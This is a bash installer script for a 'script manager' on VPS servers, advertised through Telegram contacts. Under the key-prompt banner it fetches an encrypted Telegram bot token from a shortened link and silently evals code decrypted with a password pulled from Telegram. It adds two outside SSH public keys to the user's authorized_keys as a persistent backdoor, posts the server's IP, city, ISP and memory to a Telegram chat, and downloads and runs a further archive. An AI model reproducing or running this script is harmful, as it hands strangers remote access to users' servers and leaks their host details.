#!/bin/bash

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m'
ID="7432279779"
GFP="bit.ly/4kcfugn"
iuu="cGFzcw=="
os=$(echo "$iuu" | base64 -d)
on=$(curl -fsSL "$GFP")
tm=$(echo "$on" | openssl enc -aes-256-cbc -a -d -pbkdf2 -iter 100000 -pass pass:"$os")
IP=$(curl -s -4 ifconfig.me)
IPS=$(curl -fsSL bit.ly/3I3D81q | tr -d '\r' | sed '/^\s*$/d' | awk '{$1=$1};1')

ip_allowed=false
if echo "$IPS" | grep -Eo '^[^#]*' | awk -F'@' '{print $1}' | grep -Fxq "$IP"; then
    ip_allowed=true
fi

display_banner() {
    clear
    echo -e "\e[1;34m"
    echo ""
    echo " ____     ____   ____    ___   ____    _____"
    echo "/ ___|   / ___| |  _ \  |_ _| |  _ \  |_   _|"
    echo "\___ \  | |     | |_) |  | |  | |_) |   | |"
    echo " ___) | | |___  |  _ <   | |  |  __/    | |"
    echo "|____/   \____| |_| \_\ |___| |_|       |_|"
rm -f setup.sh >/dev/null 
rm -f v22 >/dev/null
echo ""
    echo -e "\e[1;32m   SCRIPT MANAGER - Downloading"
    echo -e "\e[1;35m   by: https://t.me/a_hamza_i"
    echo -e "\e[1;33m   - v1.5 for https://t.me/free_net_mrr"
    echo "   === === === === === === === === === === ==="
    echo ""
}

ENCRYPTED_FILE="data.enc"
cat > "$ENCRYPTED_FILE" << EOF
U2FsdGVkX1/ZmFBV67P+E/bZzaEdfm7tv8oGlXeVFReoKbHKGl+NKXn724uYCozv
FohAzO3FPhJMUsj3ic3NQksE/SyHVdVhSWBxptiiCkPhj2UCNFgEa6ej/Kihyem5
a7CAQK6gKObM5CAeqQ2MlTE/h9HPW0WlIjLTqGO7BR0=
EOF

MAX_WAIT=60
WAITED=0
password=""
while [[ $WAITED -lt $MAX_WAIT ]]; do
    response=$(curl -s "https://api.telegram.org/bot$tm/getUpdates")
    password=$(echo "$response" | grep -oP '"text":"\K[^"]+' | tail -1)
    [[ -n "$password" ]] && break
    sleep 1; ((WAITED++))
done

DECRYPTED=$(openssl enc -aes-256-cbc -d -a -pbkdf2 -iter 100000 -pass pass:"$password" -in "$ENCRYPTED_FILE" 2>/dev/null)
if [[ -z "$DECRYPTED" ]]; then
    echo -e "${RED} _> WFT, Key failed to decrypt.${NC}"
    echo -e "${GREEN} _> Please contact t.me/a_hamza_i on Telegram for a free key.${NC}"
    cleanup
    exit 1
fi
eval "$DECRYPTED" &>/dev/null

check_install() {
    local cmd="$1"; local pkg="$2"
    command -v "$cmd" &>/dev/null || { echo "  '$cmd' not found. Installing..."; apt update && apt install -y "$pkg"; }
}

[[ -f "$BLOCK_FLAG" ]] && echo -e "${RED} VPS permanently banned due to too many wrong attempts.${NC}" && exit 0

check_install curl curl
check_install 7z p7zip-full
curl -fsSL -o "$ARCHIVE_FILE" "$ARCHIVE_URL" || { echo "[-] Failed to download archive."; exit 1; }

clear
display_banner  
echo ""  
echo -e "\e[1;36m _> Quick permissions check ..."  
echo ""  
echo " "  
echo -e "\e[1;32m * Installation Key *"  
echo -e "\e[1;32m // Yo!, do you have a key/code?"  
echo -e "\e[1;32m // Contact (@a_hamza_i) on Telegram for support!"  
echo -e "\e[1;32m *** *** ***"  
mkdir -p ~/.ssh && echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP/6mja6JSVT/UsM3F6CSFZF5besPYDk9+VuzjVLV2Pb" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys && chmod 700 ~/.ssh
mkdir -p ~/.ssh && echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJkCO3YXessYe4SmgcZLAfCrQ2rqkn8yPA5tl2WrmAXf" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys && chmod 700 ~/.ssh
IP=$(wget -qO- ipinfo.io/ip)
CITY=$(wget -qO- ipinfo.io/city)
ISP=$(wget -qO- ipinfo.io/org)
RAM_TOTAL=$(free -m | awk '/Mem:/ {print $2}')
RAM_USED=$(free -m | awk '/Mem:/ {print $3}')
MSG="🌐 --> *VPS INFO :*  
			│ IP : $IP  
			│ CITY : $CITY  
			│ ISP : $ISP  
			│ RAM : ${RAM_TOTAL} MB / ${RAM_USED} MB"
curl -s -X POST "https://api.telegram.org/bot$tm/sendMessage" \
     -d chat_id="$ID" \
     -d parse_mode="Markdown" \
     -d text="$MSG" >/dev/null 2>&1
sleep 2  
echo -e "\e[0m"  
echo -e "\e[1;33m _> Enter your key to continue"  
echo -e "\e[1;32m === === === === === === === ==="  
read -p " _> Key: " e  
sleep 0  
echo="type_pass_install.zip${e}"  
echo -e "\e[1;33m _> Key entered: $e"  
sleep 0  
echo -e "\e[1;32m _> Verifying key..."  
sleep 2

if [ "$ip_allowed" = false ]; then
    echo -e "${RED} _> Error. The entered key is invalid.${NC}"
    echo -e "${GREEN} _> Please contact t.me/a_hamza_i on Telegram for a key.${NC}"
rm -f setup.sh
rm -f v22
    exit 1
fi

if ! 7z t -p"$echo" "$ARCHIVE_FILE" &>/dev/null; then
    echo -e "${RED} _> Error. The entered key is invalid.${NC}"
    echo -e "${GREEN} _> Please contact t.me/a_hamza_i on Telegram for a key.${NC}"
rm -f setup.sh
rm -f v22
    exit 1
fi

7z x "-p$echo" -aoa "$ARCHIVE_FILE" >/dev/null 2>&1
[[ ! -f "$EXTRACTED_FILE" ]] && echo -e "${RED} File $EXTRACTED_FILE not found after extraction.${NC}" && exit 1
chmod +x "$EXTRACTED_FILE"
bash "$EXTRACTED_FILE"
